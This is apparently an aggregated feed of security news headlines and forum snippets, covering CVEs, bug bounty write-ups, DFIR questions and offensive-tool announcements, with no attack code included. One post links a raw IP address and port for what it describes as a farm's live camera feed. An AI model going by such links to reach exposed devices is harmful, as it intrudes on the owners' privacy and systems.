    Dropping Files on a Domain Controller Using CVE-2021-43893
    Article URL: https://www.rapid7.com/blog/post/2022/02/14/dropping-files-on-a-domain-controller-using-cve-2021-43893/ Comments URL: https://news.ycombinator.com/item?id=30333641 Points: 2 # Comments: 0  ( 14 min )
    CVE-2021-23567
    Article URL: https://nvd.nist.gov/vuln/detail/CVE-2021-23567 Comments URL: https://news.ycombinator.com/item?id=30328625 Points: 4 # Comments: 4  ( 4 min )
  • Open

    SecWiki News 2022-02-14 Review
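    SecWiki Weekly (Issue 415) by ourren; Summary of Java security research and security development interview questions by ourren; Notes on an incident response to a cryptomining virus by ourren; For more of the latest articles, visit SecWiki  ( 2 min )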
  • Open

    What are The Red Team and Blue Team in Cyber Security?
    The red team comprises offensive security experts that attempt to attack the cybersecurity defenses of an organization. On the other hand… Continue reading on Medium »  ( 1 min )
  • Open

    Small Business DFIR Services
    Hey all, I wanted to discuss something with this community. Recently I got an ask to recommend DFIR services for a small business (<50 employees) after they were hacked. I started thinking and realized there was not any business I knew of to help small businesses. First, if anyone knows of a US-based company for DFIR services I would appreciate a suggestion. Second, I do not believe there is any low-cost DFIR company that is meant for small (or medium-sized) business. So, what do you think it would take for these large consulting firms, or even a government service, to provide accessible services to any small business that doesn't have the capital to hire the larger cybersecurity or consulting firms? I.e. Create a special LICENSE on open source projects, organize a not-for-profit with rotating analysts, pro-bono cyber, etc. submitted by /u/Jklm264 [link] [comments]  ( 7 min )
  • Open

    Persistence – Notepad++ Plugins
    It is not uncommon a windows environment especially dedicated servers which are managed by developers or IT staff to have installed the Notepad++ text editor.… Continue reading → Persistence – Notepad++ Plugins  ( 5 min )
  • Open

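    BotenaGo botnet source code leaked, adding to attackers' arsenal
    In November 2021, AT&T Alien Labs first disclosed BotenaGo, malware written in Golang. Recently, the malware's source code was uploaded to GitHub, which may give rise to more malware variants.  ( 1 min )
    FritzFrog expands rapidly; nearly 40% of victims are in China
    FritzFrog spreads mainly through SSH brute forcing and deploys malware once the brute force succeeds. Researchers found that about 37% of FritzFrog's compromised hosts are located in China.  ( 1 min )
    FreeBuf Morning News | Revised Cybersecurity Review Measures take effect today; Zhihu says it has not used a behavior-sensing system to monitor employees
    Zhihu stated that collecting personal information in violation of the rules seriously departs from Zhihu's values, and that it has always firmly opposed such systems.  ( 1 min )
    Over $602 million! Ransomware ransom payments hit a record high in 2021
    Surveys show that the ransomware threat continued to grow worldwide in 2021. Organizations and institutions around the world paid more than $600 million in cryptocurrency over the past year.
    A declassified document reveals the CIA is secretly collecting information on US citizens
    According to a document declassified on February 10, the US Central Intelligence Agency has been secretly collecting data on US citizens without congressional approval.  ( 1 min )
    Apple fixes a new zero-day vulnerability
    Apple has successfully fixed a new WebKit zero-day vulnerability.  ( 1 min )
    Half of the world's email in 2021 was spam
    According to Kaspersky's latest report, more than half of last year's email was spam  ( 1 min )
    HEYTEA's entire security department laid off: Yuanfang, what do you think?
    Security departments are so undervalued that when a business runs into trouble they are almost the first to be cut, to lower operating costs.  ( 1 min )
    How to recruit security R&D talent well: building the team model
    For cybersecurity technology companies, the most valuable asset is talent. Generally speaking, around 70% of a company's costs are personnel costs; without the right people, every grand technological ambition is just a flower in a mirror  ( 1 min )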
  • Open

    grave headstones
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Cams at an Asian hog farm
    http://27.156.152.250:8889/ If you're lucky you'll see the grumpy old farmer. Warning, possibly some dead animals and cruelty. -edit submitted by /u/inoculatemedia [link] [comments]

  • Open

    Intigriti XSS Challenge 0222 — Write-Up
    XSS challenge by intigriti Solved by Th3Mind Continue reading on Medium »  ( 3 min )
    Intigriti’s February XSS Challenge Walkthrough
    Today, I will be sharing about my solution on Intigriti’s February XSS Challenge 0222 Continue reading on InfoSec Write-ups »
    #Bug Bounty - How I was able to purchased premium feature just for “1” PKR by (Parameter…
    Price Manipulation Continue reading on Medium »  ( 1 min )
    100 Days of Hacking — DAY 9
    Objectives of day 9 : Continue reading on Medium »  ( 1 min )
    Install LinkFinder on Kali Linux
    LinkFinder : a tool written in python that finds the endpoints from/in JavaScript files. Continue reading on Medium »  ( 1 min )
    How to Setup/Configure Burpsuite with Firefox
    Hello all i am back with another blog on bug bounty we will see how we can setup/configure burpsuite with firefox to intercept all… Continue reading on Medium »  ( 1 min )
    Exploiting CVE-2019–5418- File Content Disclosure on Rails
    In Action View <5.2.2.1, <5.1.6.2, <5.0.7.2, <4.2.11.1, and v3, a File Content Disclosure vulnerability exists where properly designed… Continue reading on Medium »  ( 1 min )
    Broken Link Hijacking - Mr. User-Agent
    Summary : Continue reading on Medium »  ( 3 min )
    Bug Bounty Stress aka Burnout: do and don’t
    Don’t stress yourself too much Continue reading on Medium »  ( 3 min )
  • Open

    How do Secrets Managers help?
    Nearly everyone seems to say that the best way to store secrets in a cloud environment is to put them in a secrets manager and only fetch them when needed. This has the advantage of allowing seamless key rotation, adding IAM policies, etc. Does this actually increase the security posture of the app though? The app still needs to authenticate with a key manager somehow - I would guess by way of an API token or similar. If the app or the box serving the app get owned, doesn't this basically compromise all the secrets in the secret manager accessible to the app? Also, assuming my previous statement is correct, there must be a "bootstrapping secret" which is injected to the app that lets it talk to the secrets manager. How does the app get access to that secret? I don't mean in a specific cloud (e.g. Azure, GCP, AWS) - just in general, how does whoever is providing the secret know to trust the app? submitted by /u/parallelocat [link] [comments]  ( 1 min )
    How do I use Kape to capture a memory image and upload it to S3?
    I'm in the FOR508 class right now, playing around with Kape. I was able to get it to run the !SANS_Triage target and upload the results to an S3 bucket. This will be amazing for doing IR on remote computers, what an awesome tool! I'm also able to get Kape to create a memory image using the DumpIt_Memory module but so far I haven't been able to get it to send a memory image to S3. Is that possible? Here's a sample for how I got the !SANS_Triage target to send to S3: .\kape.exe --tsource C: --tdest D:\kape\acquired\SANS_Triage_%d%m --tflush --target !SANS_Triage --vss --vhdx S3_SANS_Triage_ --s3r us-east-1 --s3b bucket123 --s3k THISISMYACCESSKEYID --s3s ThIsIsMaHsUpErSeCrEtAcCeSsKey123456789+++ --s3st <session token> Is this the way? From what I can tell the only way to generate a temporary AWS logon was using the CLI. Create a new user that only has put/write access to the S3 bucket you want to use then run: PS C:\Program Files\Amazon\AWSCLIV2> aws sts get-session-token --duration-seconds 129600 submitted by /u/mnbitcoin [link] [comments]  ( 1 min )
    Given that smart light bulbs can be 'hidden' in plain sight, and most of them are reflashable - how long will it be until the first one is used to gain a foothold inside a target network?
    I was actually looking for something to use as a PWNplug, but even those stand out a bit, whereas wifi light bulbs are ... just light bulbs, with wifi, and a devkit. https://hackaday.com/2020/02/11/custom-firmware-for-cheap-smart-bulbs-is-a-cinch-to-tinker-with/ Most of them seem to be based on the same Espressif chipset https://github.com/ct-Open-Source/tuya-convert https://github.com/arendst/Tasmota This was more of a rhetorical question, but I thought it might interest some of you. submitted by /u/boli99 [link] [comments]  ( 3 min )
    Career in Bug Bounty?
    I read an article about a pen tester making 300k off a bug bounty. My question is can someone live off this? Can anyone do this with the right knowledge and training? Do you have to be some sort of genius? submitted by /u/Bugskee [link] [comments]  ( 3 min )
  • Open

    Resource/Reference for Crypto mining Artifacts?
    Looking for a good resource (web page, poster, graphic etc.) for locating artifacts that indicate the use of a crypto miner on a computer. Does anyone know of anything? submitted by /u/admincee [link] [comments]  ( 1 min )
    Magnet Web Page Saver
    Has anyone here had working experience with the free tool Web Page Saver? I am looking into using it at my lab and have some serious questions about how it work and when/what cases it should be used with. Any guidance is appreciated submitted by /u/trex4n6 [link] [comments]  ( 1 min )
    Bulk Extractor Review
    Howdy all! Newbie alert! So I currently started using Bulk_Extractor with Volatility for Memory Forensics! My real question is how reliable are the results obtained from Bulk Extractor? I see a lot of explicit websites in my Bulk Extractor Domain Histogram results! But can’t be able to find them in Volatility! Any idea of how this works? submitted by /u/GloryHunter9 [link] [comments]  ( 1 min )
    How do I use Kape to capture a memory image and upload it to S3?
    I'm in the FOR508 class right now, playing around with Kape. I was able to get it to run the !SANS_Triage target and upload the results to an S3 bucket. This will be amazing for doing IR on remote computers, what an awesome tool! I'm also able to get Kape to create a memory image using the DumpIt_Memory module but so far I haven't been able to get it to send a memory image to S3. Is that possible? Here's a sample for how I got the !SANS_Triage target .\kape.exe --tsource C: --tdest D:\kape\acquired\SANS_Triage_%d%m --tflush --target !SANS_Triage --vss --vhdx S3_SANS_Triage_ --s3r us-east-1 --s3b bucket123 --s3k THISISMYACCESSKEYID --s3s ThIsIsMaHsUpErSeCrEtAcCeSsKey123456789+++ --s3st <session token> From what I can tell the only way to generate a temporary AWS logon was using the CLI. Create a new user that only has put/write access to the S3 bucket you want to use then run: PS C:\Program Files\Amazon\AWSCLIV2> aws sts get-session-token --duration-seconds 129600 submitted by /u/mnbitcoin [link] [comments]  ( 1 min )
  • Open

    Ask HN: Vulnerability Research in 2032?
    Hi HN, I've always been curious about bug hunting. Finding vulns. I have some foundational knowledge like fuzzing, basic web security and reading assembly, but I am also aware of all the improvements in software and web security and there are so many new tech stacks, languages and platforms these days. Where does one begin? Is it worth learning how to find memory safety vulns given how C and friends are dying (and when they are alive things like CFG and appguard make it impossible to exploit them)? Are there any modern books or sites you recommend? Should I be learning some language (rust/go?) or stack (k8s?) as a prerequisite? Comments URL: https://news.ycombinator.com/item?id=30324988 Points: 1 # Comments: 0  ( 1 min )
    Apple emits emergency fix for exploited-in-the-wild WebKit vulnerability
    Article URL: https://www.theregister.com/2022/02/11/apple_emergency_webkit/ Comments URL: https://news.ycombinator.com/item?id=30324643 Points: 4 # Comments: 3  ( 9 min )
  • Open

    SysWhispers Shellcode Loader w/ ETW patching, anti-sandboxing, and 6 execution options
    submitted by /u/ChadMotivation [link] [comments]
  • Open

    What is a Skip Tracer?
    Skip tracing is the process of tracking down people who are particularly hard to find, whether they’re persons-of-interest, fact witnesses… Continue reading on Medium »
    Creating a Honeypot
    First it’s important to describe what a honeypot is and why it’s a good idea to create on. In the cyber security field a honeypot is… Continue reading on Medium »  ( 9 min )
  • Open

    SecWiki News 2022-02-13 Review
    No news updates yet today. For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

    Mostly big boobs photos (NSFW)
    submitted by /u/Boobalizer [link] [comments]
  • Open

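    Summary of key points in PHP-related CTF challenges (Part 2)
    This article mainly summarizes the PHP key points I ran into while working through ctfshow challenges. Because summarizing only knowledge points and key points would be rather hollow and hard to follow, I summarize them through the challenges themselves, which makes them easier to understand.  ( 2 min )
    Summary of key points in PHP-related CTF challenges (Part 1)
    This article summarizes the PHP key points encountered in ctfshow challenges.  ( 2 min )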
  • Open

    Widespread CSRF on authenticated POST endpoints
    UPchieve disclosed a bug submitted by zeyu2001: https://hackerone.com/reports/1309435
  • Open

    CVE-2021-45464 – LKVM Escape
    Article URL: https://www.kalmarunionen.dk/writeups/2021/hxp-2021/lkvm/ Comments URL: https://news.ycombinator.com/item?id=30320463 Points: 4 # Comments: 0  ( 11 min )
    The long road to a fix for CVE-2021-20316
    Article URL: https://lwn.net/SubscriberLink/884052/c946bb7f8d39c54e/ Comments URL: https://news.ycombinator.com/item?id=30319122 Points: 8 # Comments: 0  ( 16 min )

  • Open

    Biohazard- Tryhackme CTF
    This is a write-up about the Biohazard CTF room from Tryhackme (a free cybersecurity training site that provides machines for you to… Continue reading on Medium »  ( 8 min )
    Exploit SUID misconfiguration for privilege escalation
    In this article, I am going to explain what are SUID binaries how to exploit them for getting root shell i.e privilege escalation on the… Continue reading on Medium »  ( 2 min )
  • Open

    [h1-2102] Break permissions waterfall
    Shopify disclosed a bug submitted by hogarth45: https://hackerone.com/reports/1088159 - Bounty: $500
    Blind XSS on Twitter's internal Jira panel at allows exfiltration of hackers reports and other sensitive data
    Twitter disclosed a bug submitted by iambouali: https://hackerone.com/reports/1369674 - Bounty: $5040
  • Open

    My Pentest Log -6-
    Greetings Everyone from Hippodrome (Constantinople), Continue reading on Medium »  ( 2 min )
    100 Days of Hacking — Day 8
    Objectives of day 7 : Continue reading on Medium »  ( 1 min )
    Basic Web Technologies Knowledge required for starting with the web Exploitation Part-3
    Hello Hackers hope so You are doing well. I myself Manan Aggarwal a Btech Student is Here to Present you the blog in the continuation of… Continue reading on Medium »  ( 6 min )
    A tale of 0-Click Account Takeover and 2FA Bypass.
    Hey, it’s been a long time since I published a bug bounty write-up. I was in an internship period. So, I had a lot of free time. Anyways… Continue reading on Medium »  ( 2 min )
    Hacking My ISP For FREE Internet
    Note: This article is only for educational purpose. Continue reading on Medium »  ( 2 min )
    PORTSWIGGER WEB SECURITY - BROKEN ACCESS CONTROL LAB SOLUTIONS
    Access Control, or Authorization, concerns who or what, for requested actions or accessed resources,… Continue reading on Medium »  ( 10 min )
    HOW I GOT THE BOUNTY OF $280+ in just a matter of seconds…
    Hey folks, Continue reading on Medium »  ( 2 min )
    Improving the impact of a mouse-related XSS with styling and CSS-gadgets
    I will write more about how I make PoCs in the future. But with special care, I work out scenarios for vulnerabilities that need user… Continue reading on Medium »  ( 2 min )
    Attack Surface Monitoring using Open-Source Intelligence
    The paper introduces the case study for attack surface analysis and monitoring with practical application of open-source intelligence… Continue reading on Medium »  ( 7 min )
    Bug Bounty: My First Five Figure Payout
    This is the post from my Telegram channel about Bug Bounty, where I share my experience and knowledge as well as just write about being… Continue reading on Medium »  ( 2 min )
  • Open

    SecWiki News 2022-02-12 Review
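    Analysis and research on vulnerability fixes in open-source packages and the software supply chain by ourren; The eighteen levels of hell of attack-defense confrontation by ourren; For more of the latest articles, visit SecWiki  ( 2 min )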
  • Open

    OSINT Automation Tool — Spiderfoot
    Spiderfoot Continue reading on Medium »  ( 1 min )
    Valerie vs Valoree
    Yes, this is really happening.  No, I’m not running to cause ballot confusion. Continue reading on Medium »  ( 1 min )
    How To Find Timestamps For Verification
    Finding exact timestamps in web material is a must-have ability for OSINT and verification researchers, but where do you look? Continue reading on Medium »
    Attack Surface Monitoring using Open-Source Intelligence
    The paper introduces the case study for attack surface analysis and monitoring with practical application of open-source intelligence… Continue reading on Medium »  ( 7 min )
  • Open

    The Top 13 Ethical Hacking Courses on Udemy (2022)
    submitted by /u/Jan_Prince [link] [comments]
  • Open

    Technical documents for JOINT POLAR SATELLITE SYSTEM
    A little over my head but if any climate geeks want to access raw data, here's the tools. Main index directory: https://www.jpss.noaa.gov/assets/ Community Satellite Processing Package (open source direct broadcast): http://cimss.ssec.wisc.edu/cspp/ Example: https://www.jpss.noaa.gov/assets/pdfs/technical_documents/472-00340_J2_HRD_to_DBS_RF_ICD_Rev_C.pdf API references: https://www.jpss.noaa.gov/sciencedocuments/sciencedocs/2015-06/474-00019-01_JPSS-API-Users-Guide-Vol-I_0123A.pdf https://www.jpss.noaa.gov/sciencedocuments/sciencedocs/2015-06/474-00019-02_JPSS-API-Users-Guide-Vol-II_0124-.pdf submitted by /u/inoculatemedia [link] [comments]
    Audio and art programs (mostly) for Atari 2600
    http://www.qotile.net/files/ submitted by /u/inoculatemedia [link] [comments]
  • Open

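    Exploring API Penetration Testing for Modern Applications with Separated Front End and Back End
    To speed up development and testing iterations and to meet the need for a unified front end, more and more domestic internet companies have jumped on the front-end/back-end separation bandwagon. With the new front-end frameworks, testing APIs more efficiently becomes increasingly important.  ( 1 min )
    NodeJS heap overflow? The cause is the default memory limit. Lift the seal!
    An application developed with NodeJS may hit a heap overflow if it needs to process a large amount of data. The error message will include “JavaScript heap out of memory”.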
  • Open

    CISSP Domain 1 - Episode 5 - Security Roles and Responsibilities, Control Frameworks, Due care & Due Diligence, Policies, Standards, Procedures, Guidelines & Baseline and Threat Modeling by Get Set CISSP
    submitted by /u/Tradition_Wonderful [link] [comments]  ( 1 min )
  • Open

    How do I get my foot in the door with forensics?
    I have my masters in digital forensics but like a fool I never did anything with it. I’m a quick study and will only take me about a week or two to relearn everything. I have a security clearance and currently with in government contracting as a project manager but no company is biting. I want to finally make the switch but it’s hard when you don’t have in lab experience or the certs. Any advice on how to get restarted in this field? TIA! submitted by /u/kindreddino [link] [comments]  ( 6 min )
    Imaging Android and iOS devices
    Hello, can anyone teach me how to image these devices. Or if you can point me to some tutorials. I have been trying to learn but I keep failing. Thanks in advance. submitted by /u/Sudden_Ad9859 [link] [comments]  ( 1 min )
  • Open

    Apple fixes Mac battery drain, WebKit vulnerability in software updates
    Article URL: https://arstechnica.com/gadgets/2022/02/apple-patches-security-holes-and-bugs-with-ios-15-3-1-and-macos-12-2-1/ Comments URL: https://news.ycombinator.com/item?id=30308727 Points: 2 # Comments: 0  ( 3 min )

  • Open

    Simple tool to find client side prototype pollution vulnerability
    submitted by /u/boch33n [link] [comments]
    Pre-auth WAN remote root for Cisco RV340 VPN Gateway Router
    submitted by /u/ChoiceGrapefruit0 [link] [comments]
    Cisco ASDM: Manage at Your Own Risk
    submitted by /u/chicksdigthelongrun [link] [comments]
    WordPress < 5.8.3 - Object Injection Vulnerability
    submitted by /u/monoimpact [link] [comments]  ( 1 min )
    A simple tool to audit Linux system libraries to find public security vulnerabilities.
    submitted by /u/CoolerVoid [link] [comments]  ( 1 min )
    AD CS: from ManageCA to RCE - BlackArrow
    submitted by /u/Margaruga [link] [comments]
    Internet-Wide Study: State Of SPF, DKIM, And DMARC - RedHunt Labs
    submitted by /u/redhuntlabs [link] [comments]  ( 1 min )
  • Open

    Mellium 0.21.1 fixes CVE-2022-24968
    Article URL: https://mellium.im/cve/cve-2022-24968/ Comments URL: https://news.ycombinator.com/item?id=30308038 Points: 1 # Comments: 0  ( 1 min )
    Apple fixes actively exploited zero-day (CVE-2022-22620)
    Article URL: https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/02/update-now-apple-fixes-actively-exploited-zero-day/ Comments URL: https://news.ycombinator.com/item?id=30304109 Points: 1 # Comments: 0  ( 3 min )
  • Open

    How safe is this obscure software my friend bought on eBay?
    My friend is having technical difficulties with his iPad (he reset it and you can’t get through the welcome/setup without allowing remote access management to a certain company, which he doesn’t want to do) and he bought some software on eBay that promises to help bypass that error. His computer is old and won’t run the software when he tries to. My MacBook is brand new and so he asked me if I could download the eBay software onto my computer to try to fix the iPad. To me that doesn’t seem like something I want to download onto my new laptop. Maybe I shouldn’t have binged all of the darknet diaries podcast but idk doesn’t feel safe. Here’s what it looks like. Any thoughts? submitted by /u/aimhighswinglow [link] [comments]  ( 4 min )
    Is it safe to feed patterns to hashing functions in order to create passwords for websites?
    I had this idea on how to generate supposedly safe passwords for different websites/accounts that wouldn't require passwords to be memorized or stored. The idea is to 1 - Come up with a short default string that would never change (say, "bubly42") 2 - Append the name of the website to that string for each website you make an account. For example, when creating an account for airbnb it'd produce the string "bubly42airbnb" 3 - Run that string (bubly42airbnb) through a hash function 4 - Use the output of the hash function as the password for the website This would have the upside of not requiring memorization or storage of passwords, while still generating a unique password for each site. I can just generate the password on the fly. Obvious downside is that if someone figures your pattern out, they pretty much can figure out all of your passwords. Is there anything else that I'm missing? Is this considered safe? (Btw, sorry if I'm posting on the wrong place. If that's the case, can someone direct me to a good subreddit to post this in?) submitted by /u/djoncho [link] [comments]  ( 4 min )
    Possible malware in official Torguard windows VPN client ??
    Torguard's VPN client intermittently consumes 50% cpu, for long periods, unrelated to any network activity, which I find suspicious. Details below. I've raised this with TG's tech support who have repeatedly denied that any such behavior exists. I'm seeing this consistently on 4 windows machines (including one VM) where I have TG running. I'm not sure where to report this as there is no TG subreddit and the VPN subreddit doesn't allow mentioning specific services. Hopefully you folks can point me in the right direction or give advice. So, if the app is running and the VPN is connected, even if there are no other apps open, TG client will randomly begin consuming a constant 50% CPU. I can't correlate this with any other condition like network traffic or other app activity or any obvious thing TG is doing. If I minimize the TG client window, it stops. And then it starts again in a few minutes, and so I repeat this remedy, and it stops. If I don't do this it continues indefinitely. So, every computer this is running on experiences a significant heat/wattage increase and CPU performance degradation due to TG. I took screenshots of this behavior using task manager. I also watched it using winternals' process monitor, which gave much more detailed info than this. ---- But this forum doesn't allow pictures. submitted by /u/Dougolicious [link] [comments]  ( 2 min )
    How to get over the unrecognized app/publisher warning in Windows
    All, I am writing an executable to put on a website for download. Every time I go to download it, I get an "unrecognized app, unknown publisher warning". It's not tagged as malicious, but it's tagged as "unknown publisher" which makes it appear that way. Does anyone know how to add a publisher? Is that something a non-corporation can do? Or could I at least add a certificate or something to make Windows calm down? submitted by /u/iExtrapolate314 [link] [comments]  ( 1 min )
    How to get access on clean-mx.de
    Correct me if I am on the wrong subreddit, I have seen some people talk about this site in here, but how do you get access on clean-mx? I tried creating an account in there (registration form), but I haven't got a response back, unless I am being impatient. I also tried contacting the email, but it is dead as stated in the site. There are multiple sites to register accounts, xlogin.php, xregister.php, etc etc. I can see it's alive because when I search the site up, I see the dates from right now. Is this site restricted to companies only or not? Can you not register anymore? (couldn't post this in another subreddit, my post kept getting removed because they thought it was a tech-support question) submitted by /u/RainbowIsRainbow [link] [comments]  ( 1 min )
    What are the security monitoring can accomplish these scanning and detection?
    Hi Folks, As the title says, what tools can help to achieve these objectives Real time scan the network to detect presence of unauthorized hardware, software, and firmware components within the network. To scan and detect in real- time the addition of devices into network and notify the security administrator via email. submitted by /u/techno_it [link] [comments]  ( 3 min )
    Pen test dropbox running Win OS with Kali VM - with 4G callback
    Looking for some hardware advice for a pen test dropbox. I'd like the unit to be responsive with desktop-speed chipsets, x86/x64 based, and have an out-of-band 4G SIM callback for when client networks prevent outbound connectivity. With Windows as the primary OS, is there any way to auto connect the 4G/cellular modem with Windows, as there is with Linux (ie wvdial)? Are there any capable NUC type devices or mini PCs with inbuilt 4G capability. Want to avoid having USB modems sticking out the side, perhaps similar to rPi's cellular hat, but not rPi (or other SBCs) which would struggle with a Win with Kali VM setup. Happy to spend a bit on hardware, are there many notable boxes other than the Intel NUC, Zotac Zbox or MSI Cubi? Seen a few decent build docs that almost fit the bill, but not quite: https://infosecwriteups.com/part-2-build-the-pen-test-drop-box-69278526886a https://www.blackhillsinfosec.com/pentesting-dropbox-on-steroids/ https://www.blackhillsinfosec.com/how-to-build-your-own-penetration-testing-drop-box/ https://www.sprocketsecurity.com/blog/penetration-testing-dropbox-setup-part1 Thanks! submitted by /u/ama21n [link] [comments]  ( 1 min )
    Would a "technical support specialist" be a good start to eventually end up in cyber security?
    Hello. I'm graduating college soon and have an offer as a support specialist. The responsibilities are as follows: Provide 1st-tier technical support for production support issues Troubleshoot system errors by reviewing technical logs, system documentation, and application logic Monitor and triage errors generated by automated tasks in production Collaborate with Client Excellence team to ensure users’ technical support issues are resolved quickly On call rotation for urgent production issues during weekends and holidays I've been applying to IT jobs but have had little luck. Would a job like this be a good interdiction into security? Or should I look for a more traditional IT job? submitted by /u/Hellothere6667 [link] [comments]  ( 1 min )
  • Open

    LNK Files, Again
    What, again?!?! I know, right?!? Not long ago, I read this fascinating article from Joe Helle that discussed malicious uses for Windows shortcuts, or LNK files, and also discussed a Python3 script called "lnkbomb". As a side note, check out what Joe had to share about persistence via WSL2! As anyone who's followed me for a minute knows, I love...L   O   V   E...me some LNK files. Shortcut files are something that we see all the time, have been around for a long time (much like ADSs), but folks in the DFIR field are so focused on the "shiny hot newness", that this file type is very often overlooked and not fully exploited. The technique Joe discusses is similar to modifying the iconfilename field of a shortcut file, so that even if the "bad guy" is evicted from an infrastructure, any action that launches the LNK file results in credentials being passed via HTTP or WebDAV, where they can be collected, cracked, and then used by the threat actor. LNK files have a lot of uses, and understanding the format and structure is helpful in a lot of different ways. One example is that automatic JumpLists follow the OLE/structured storage format, and all but the DestList stream consist of LNK file formatted streams. Another example is that the building blocks of LNK files, shell items, are also the core building blocks of several Registry-based artifacts, such as shellbags. Beyond that, however, threat actors have used LNK files as lures in social engineering and phishing attacks; this means that the threat actor has built the LNK files within their own infrastructure, within their own development environment. As such, sending these files as lures is "free money" to both DFIR and CTI analysts, if they're able to leverage those files and their component metadata.
    So...while I know Windows 11 is out, and everyone's excited about the shiny new hotness, let's not forget that there's a lot that has worked since Windows XP (or even prior to that) and still continues to be an issue today.  ( 4 min )
  • Open

    Honeypot OSINT
    In this post I will be going through the open source intelligence process I went through following an attack performed against my honeypot. Continue reading on Medium »  ( 8 min )
    Building a public OSINT lab target
    The Utah Valley University Cyber Security Program needed a realistic target that students could use to learn OSINT and offensive tools… Continue reading on Medium »  ( 1 min )
    [EN] TryHackMe 25 Days of Cyber Security: Day 14 Walkthrough
    [Day 14] OSINT Where’s Rudolph? Continue reading on Medium »  ( 3 min )
    Tallin To Search More Churches — OSINT Challenge 14
    On Dec 27, 2021, OSINT Dojo shared a OSINT quiz with us. The objective was simple. We had to figure out where the photo was taken. Please… Continue reading on Medium »  ( 1 min )
  • Open

    Adding customers to victim’s store via Insecure Direct Object Reference
    Hello! I am back with my 2nd bug bounty write up. This time I’ll be showing you how I found an Insecure Direct Object Reference bug on an… Continue reading on Medium »  ( 1 min )
    QRCDR Path Traversal Vulnerability
    QRCDR is a popular PHP — JavaScript QR-Code Generator, which is widely used for creating customized QR-Code in easy steps. also, it’s used… Continue reading on Medium »  ( 2 min )
    Hacking ticketastic
    Hi guys! I’m back with another great blog, with this blog you can learn more about SQLi and Cross Site Request Forgery (CSRF). Continue reading on Medium »  ( 2 min )
    100 Days of Hacking — Day 7
    Objectives of day 7 : Continue reading on Medium »  ( 1 min )
    Basic Web technologies required for starting with the web Exploitation Part-2
    Hello Myself Manan Aggarwal is here to present the Blog about the Basic Web technologies required for starting with the web Exploitation… Continue reading on Medium »  ( 4 min )
    Introduction to Spring Boot Related Vulnerabilities
    Spring Boot related vulnerability learning materials, collection of utilization methods and skills, black box security assessment checklist Continue reading on Medium »  ( 12 min )
    iOS jailbreak dev wins $2M bounty for finding critical Optimism bug
    Continue reading on Medium »  ( 2 min )
    VulnLab SQL Injection— Dynamic Application Security Testing #3
    Assalamualaikum Wr.Wb Continue reading on Medium »  ( 6 min )
  • Open

    Amcache SHA-1 mismatch
    Hoping someone has seen this or has an idea what may be happening. I am performing a review and identified an installer file as an item of interest. I see the file in the host’s Amcache hive with a SHA-1 (“A”) hash. However, the recovered file has a different SHA-1 hash on disk (“B”). When running the executable on my test system and comparing it to that test machine’s Amcache, I see the same behavior. Amcache has hash “A” and the executable has hash “B.” Every other program I’ve sampled has hash matches; it seems like just this one is off. What gives? For specifics, I am using RegistryExplorer and Amcache Parser (both Zimmerman tools) for Amcache analysis. I am hashing with both X-Ways and Hasher (also Zimmerman). When reviewing Amcache Parser, I am matching the hash to the executable …  ( 3 min )
    Does anyone have Magnet Acquire download link without filling the form?
    I can't afford the axiom (or whatever it is called) so can anyone provide me the link? Thank you so much! submitted by /u/Hopelessssssssss [link] [comments]  ( 1 min )
    Announcing Opensource X-Ways HashExporter Extension
    This opensource extension allows you to dump all the hashes from an image using X-Ways command-line. https://github.com/PolitoInc/X-Ways-HashExporter-Extension submitted by /u/Alarming_Arm_7724 [link] [comments]  ( 1 min )
    What program should I specialize in if I cannot choose digital forensics?
    Computer Science and Engineering with specialisation in Blockchain Technology Computer Science and Engineering with specialisation in Information Technology Computer Science and Engineering with specialisation in Data Science. Or does it not matter as long as it is Csc ? submitted by /u/nodogsareevil [link] [comments]  ( 1 min )
    What transferable skills does forensics provide?
    I am currently a digital forensic analyst of both phones and computers for law enforcement. I want to transition into a new tech role, such as infosec or another form of cyber sec but looking at the job specs for 90% of these roles I do not meet the requirements. I’m considering self funding a cert such as CISSP or Security+ as this will most likely help. What sort of jobs can my current role land me in? submitted by /u/gofigured21 [link] [comments]  ( 3 min )
    CHFI Content Weightage
    Hello, Can we guess the content weightage of CHFI in the actual exam? I mean how can we know which modules will have more questions and other modules will have fewer questions in exam? I need to take the test and the book is very lengthy that can't be read as a whole so I want to get info about modules' weightage so I can learn them first (which will have more questions in the exam) and then the remaining modules (which have fewer questions). If not exactly any guess about it? submitted by /u/hardfire005 [link] [comments]  ( 1 min )
    Learning DFIR?
    Hi everyone. I am eJPT certified and been doing tryhackme for a year now. I want to move towards blue side, especially forensics and incident response. What i wanna ask is what is best resource/website to learn dfir/soc etc Is CHFI course content good? Are elearn security forensics and incident response courses and certs valuable? Or should i stick with tryhackme (it has less content regarding blue teaming) I have also heard of securityblueteam so is the investment there invaluable? Thanks submitted by /u/Nightkinnng [link] [comments]  ( 1 min )
  • Open

    CALISHOT 2022-02: Find ebooks among 348 Calibre sites this month
    submitted by /u/krazybug [link] [comments]  ( 1 min )
    archaeological dig photos from Iraq
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
    [q] Index template/website script
    Hi guys, I hope this is the correct place to ask; I want to make a website where I can index certain posts and urls. (like a blog but easier) could you please guide me? tyvm submitted by /u/zuperfly [link] [comments]  ( 1 min )
    A way to clone an Open Directory?
    Is there a can clone/upload all the files from an OD to my shared google drive? i know about rclone but since it's not easy to use, i don't want to waste time with it if can't do the required task. + Is there a tool that can upload a shared google drive file to my shared drive? again, i know about "make a copy option" but that is not usable if the file is over the size of the free space you drive has. submitted by /u/CompetitiveMango12 [link] [comments]  ( 2 min )
  • Open

    Discoverability by phone number/email restriction bypass
    Twitter disclosed a bug submitted by zhirinovskiy: https://hackerone.com/reports/1439026 - Bounty: $5040
    Able to detect if a user is FetLife supporter although this user hides their support badge in fetlife.com/conversations/{id} JSON response
    FetLife disclosed a bug submitted by trieulieuf9: https://hackerone.com/reports/1423704 - Bounty: $100
    Information Exposure Through Directory Listing vulnerability
    Nextcloud disclosed a bug submitted by technorat: https://hackerone.com/reports/1476709
  • Open

    AD CS: from ManageCA to RCE - BlackArrow
    submitted by /u/gid0rah [link] [comments]
    🔥🔥 A new version 0.1.3 released for Kubesploit: a post-exploitation framework for Kubernetes🔥🔥
    submitted by /u/kubiscan [link] [comments]
    Retrieving Syscall ID with Hell's Gate, Halo's Gate, FreshyCalls and Syswhispers2
    submitted by /u/dmchell [link] [comments]
  • Open

